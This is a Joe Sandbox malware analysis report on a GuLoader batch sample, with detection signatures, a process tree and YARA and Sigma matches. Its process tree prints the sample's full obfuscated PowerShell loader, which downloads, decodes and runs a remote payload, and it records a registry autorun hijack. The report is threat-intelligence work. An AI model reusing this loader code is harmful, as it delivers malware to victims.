Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
las.cmd

Overview

General Information

Sample name:las.cmd
Analysis ID:1446786
MD5:f96b390af9be44e21ffec109cb107462
SHA1:716dda50fc30581e587c0a3d8c65d45aefbfec14
SHA256:c73db3a4bf51b48059eef2a5003feafc43dc7e93bf8c70fb51a0423c212d85a7
Tags:cmd
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7596 cmdline: powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7780 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7844 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,aCountsMylari,rasic.illehSi narMortmoHo.opm mateil brroConchlHus.oe lash.A.ophD SammoSti nw Analn RetilDag,ro TheraSuba.d Re.oFZittaiPae,nlUdrejeEr at(Garli$KorreSAkillpRedrer NetvnI,comgFormun PolyiPhenynBrutagJav neTapetr AlkasShera, Klip$MiljvR InsueUdtolgDeckhnForsks ,ampkRe.etaPoch.bEvi,asUlrdhlNow,noHaincvMangfe.egyns Slaa)Vikka ';$Regnskabsloves=$Saluterer[0];Unschool (Udvindende 'Frimu$KoncegBremslPolybolumbrbFru.ta UnfolFejlv:fore,MQ irky SvensVidertidle.iirefakGra,ieDenatrP osen Vesteopera=Smage(indsbT Shi eCh zds DaektDelet-SkattP S amaRestutProx.h P.ss Assib$S,rewREndage MayfgPresunBrodeshved.k .ricaKun,ebSolsysCap tlSnawooMurphvFloreeAnt.kstombs)schiz ');while (!$Mystikerne) {Unschool (Udvindende 'Unexp$Exi,sgLivstl Oc,ioTuarebada.taChapalKerne: UtaaU.ardcnInadepS,nica DrgrrMon,loMelanl Tumuenati dtwof,= Do.a$UferptSte,mr BanguD tabeTrafi ') ;Unschool $Fuglevildts;Unschool (Udvindende 'OrestSunwoutUnrumaDisg rErst tA.ter-OpvasSIndhulMadrieC.emeeFricapmu tr Produ4Snker ');Unschool (Udvindende ' Afkr$algaeg.ekstl Bl.koEtaerbSaigaaTermil ugge:.edebM otatyUdelis okl.tDepthiNdrinkV,reieAnantrCos,vnCap.we fst.= Nrin(CircuTentereUd elsAuspitDybva-ElocaP S,utaSolb,tTilsihSwash Orien$.mlgnR spaleFiskegDr.ftnMul ssUnslokPabula FaldbWro.hsNonrelo.avuoAvlshv uftweDyrtisVk.tr)Confi ') ;Unschool (Udvindende 'Timar$ UdefgMell lA ospoAb ombDepreaLunatlCro i:BrndeSDu.pieArmlem Uoplp FaciiBaglytAfmoneAsketrUne inGar laAlle l ryd=loopf$Mult gHejrelba sao nspebStrafaRhinol Tus,:Baja.F Basta PjatsProdutInterlJunkeaSnowde Bldgg xarcgToplae SurfsD tid+ okse+Monkl%Opr.l$TarifFTzitzlAsserdTu,nhnLussii Jammn FredgGravisPenget BankiIndbldLandfeWynefn ,ribsInkie. DvekcLedeloSpl.juStrean F,lttBrndv ') ;$Sprngningers=$Fldningstidens[$Sempiternal];}$Erstatningsfri=301739;$Capanne=29374;Unschool (Udvindende ',andr$Chrong isthlDipl oAmet.bPenneaAdaw.lRnner:KundeBDaikeikarollapprefVirker,orosaSuperg,nraatIdenteGriphrForsg Skjal=Misvi ChapeGGulddeMtg,otTr.wl-UdlaaC.arstoAll rnVandrtDialle m,ntnY gadtKedso Nonpl$SpndeRA,dreeFlighgReg.onRi dasMiniskMckniaVarmeb BrodsJernbl Nor,oAfsk vUnsadeAfdrysdrevb ');Unschool (Udvindende ' .ntt$RevolgBrusel ublaoEng obPyntsaSk delSprjt:LderiS udbyvBrddeeSv skd Aarse Nonmk.ryggu rsterleddeeUnikan Multe Skuf Over,= rist Steen[Kil eSMirexy.nforsRe.owtKi noe El.emfiefe.CorelCAfskroIndusnTrivivFo.edeSitu,rBurdstAlbes]Linie:Jumps:FaradFVealyrLommeoMythomR,forBStyreaEffuss Cagie Pr.g6Presc4 TymbS Ci,rtNontrrMetatiSpo,enPaadugTech (Tryka$CaracBHoeviiImporlSagfrf HentrKinseaGesitgShirrtLiotre U.varTempe)Seleu ');Unschool (Udvindende 'Autop$ZorrigHalvalUbeslo Py,sb.ruppaKon ol.nfor:ExtraT Un.ei Max lH.bbesOldweiDeunak D sprUdvidiUnfe,nBradegTalg. F,ers=Udsal Afre,[MarinShonilyUnfriscpositdissieWess mSag,b.DumpoT,ulleeEcto x LavrtCha h. Ud eEAnisonRebalcSterioBl erdHjem,iD.catnsu.figHa dl]Irrec:Viges:pantoAOvergSM rtiCUnfoiIA.tfuI,uthe.Bl baGkel eeRevertIdeasSTy.patTrafirPaph.iAzoxinOverbg Un o( Clem$ PipiSDebilvVokseeAnte.dElvereMi,roku deruPartir Mod.espirinBarbee Takk)Juckr ');Unschool (Udvindende 'Shurg$IntergAlarmlReorgoMongobC.oicaBoatal,elin:SourdOStrenwMaha.e,amelrVerdet,raada RolleS,pernCelle= Skru$Bro cTOve siProfilSubg.sSub eiCo,dekU yrlrEgetbi,ogienUnthegsinni.FjollsFortvuInar.bMaximsMos stF.rsgrAdvi i.tockn,ydisgTreef( Avia$IncorEKeelbr.enjis aksltIveliaKnlentRepolnSkrmbi DenonraptugpreexsDriftf .onkrSrgefiMat r,Afske$,hinnCHypnoaGrsgap,lumpaBlas.nLawnlnFisk e Ek p)Hy,ro ');Unschool $Owertaen;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7928 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fettle.Han && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7244 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2001822967.0000000008D90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000005.00000002.1989436125.000000000625A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000005.00000002.2002398118.000000000ACBC000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7596JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7596.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7844.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe0e0:$b2: ::FromBase64String(
              • 0xd1ab:$s1: -join
              • 0x6957:$s4: +=
              • 0x6a19:$s4: +=
              • 0xac40:$s4: +=
              • 0xcd5d:$s4: +=
              • 0xd047:$s4: +=
              • 0xd18d:$s4: +=
              • 0x17270:$s4: +=
              • 0x172f0:$s4: +=
              • 0x173b6:$s4: +=
              • 0x17436:$s4: +=
              • 0x1760c:$s4: +=
              • 0x17690:$s4: +=
              • 0xd981:$e4: Get-WmiObject
              • 0xdb70:$e4: Get-Process
              • 0xdbc8:$e4: Start-Process
              • 0x15d88:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Classes Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\svchost.com "%1" %*, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7244, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 Akva3Tjrne) aktf ');Unschool (Udvindende ' Ustk$Teh ng Ddssl,ndeloSentibRetiraSaddll Thor:SacchFP.erelUdgandNavernSeedeiKphesn Ove,gGrnsesIndstt UndeiArched alkieDisk,n Ove,sRatin=Inter$.tultS Sentp UdvirBenzin vantgP rapnKis.liD,rignposefgSub eeTravbr Nonss Mand. GinnsRnerepAllesl SmediAktiotMinke( Rejs$antifFJ sovoNer,orW.resl StrooCheefvNaadseBirdidTree e Fi.s)Gulds ');$Sprngningers=$Fldningstidens[0];$Unaccidented180= (Udvindende 'Phyll$AffejgSandwlbolvro K inbL peaaHac,bl Jagt:LngstBSiolaa HarrsProtoiAllemc Tornh De.mrClassoMell mcutt iForr oKalibl SkrfeC.nce=Remi NXericeGreenw arry-N.npeOkajakbUvejsj Zoquebioc,cAlgovt Rotu .nchSconvey GeogsTermitRetteeBerrimRoege.H gisN.antaeInductGtehu.Gr ndWEr bre S,lvbHolocCMargal Aktai ko.oeLocasn usigt');$Unaccidented180+=$Saluterer[1];Unschool ($Unaccidented180);Unschool (Udvindende 'Disle$ski,dB.aphoaRejems De.fiBage c ProchUnshirVip.tod alymcurviiStalaoMichelZon,neWall,.Ko.seHFiskeeU.cita speldDezine N.herSentisTaste[ Pulv$SmagsPStjerr Th riUnderv FanaiTillalP.odue TurbgKonveeTilskdmorfo]Ubety=E hel$ PlanPHoarseEkspod Molli holdcOrdinuHiplir SysteP.pulsHydro ');$Fuglevildts=Udvindende 'smert$RgrelBStou,a

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
              Machine Learning detection for dropped file
              Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
              Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.8.dr
              Source: Binary string: GoogleUpdate_unsigned.pdb source: GoogleUpdate.exe.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.8.dr
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\msoev.pdb source: msoev.exe.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\setupexe\x-none\LicLua.pdb source: LICLUA.EXE.8.dr
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.8.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1999294674.0000000008915000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
              Source: Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
              Source: Binary string: d:\dbs\el\ja2\target\x86\ship\dw\x-none\dw20.pdb source: DW20.EXE.8.dr
